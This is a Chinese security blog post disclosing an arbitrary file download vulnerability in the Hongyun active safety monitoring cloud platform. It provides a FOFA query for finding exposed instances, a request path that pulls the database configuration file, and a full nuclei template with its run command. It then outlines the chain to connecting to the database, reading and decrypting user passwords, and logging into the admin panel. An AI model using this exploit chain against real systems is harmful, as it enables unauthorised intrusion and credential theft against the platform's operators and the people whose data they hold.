鸿运主动安全监控云平台任意文件下载漏洞

admin 2024年2月23日23:01:45评论35 views字数 901阅读3分0秒阅读模式

使

01

漏洞名称

鸿运主动安全监控云平台任意文件下载漏洞

02

漏洞影响

主动安全监控云平台所有版本

鸿运主动安全监控云平台任意文件下载漏洞

03

漏洞描述

深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞,攻击者可通过此漏洞获得登录账号密码,以进行后续测试。

04

FOFA搜索语句
body="./open/webApi.html"

鸿运主动安全监控云平台任意文件下载漏洞

05

漏洞复现

POC如下

/808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

使用浏览器访问

鸿运主动安全监控云平台任意文件下载漏洞

会直接下载一个文件,查看文件

鸿运主动安全监控云平台任意文件下载漏洞

证明存在漏洞

06

nuclei poc

poc文件内容如下

id: honyun-readfileinfo:  name: 鸿运主动安全监控云平台任意文件读取漏洞  author: fgz  severity: high  reference:    - none  metadata:    fofa-query: body="./open/webApi.html"    veified: true  tags: filereadhttp:  - raw:      - |        GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1        Host: {{Hostname}}        Accept: */*    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body, '[DATABASE]')"

运行POC

 .nuclei.exe -t .honyun-readfile.yaml -u https://x.x.x.x -me honyun

鸿运主动安全监控云平台任意文件下载漏洞

运行结果输出文件的Response中包含了多组数据库配置信息

鸿运主动安全监控云平台任意文件下载漏洞

连接数据库

鸿运主动安全监控云平台任意文件下载漏洞

查看sys_user表

鸿运主动安全监控云平台任意文件下载漏洞

密码是密文,在线解密

鸿运主动安全监控云平台任意文件下载漏洞

即可登录后台

原文始发于微信公众号(AI与网安):鸿运主动安全监控云平台任意文件下载漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月23日23:01:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   鸿运主动安全监控云平台任意文件下载漏洞https://cn-sec.com/archives/2114349.html

发表评论

匿名网友 填写信息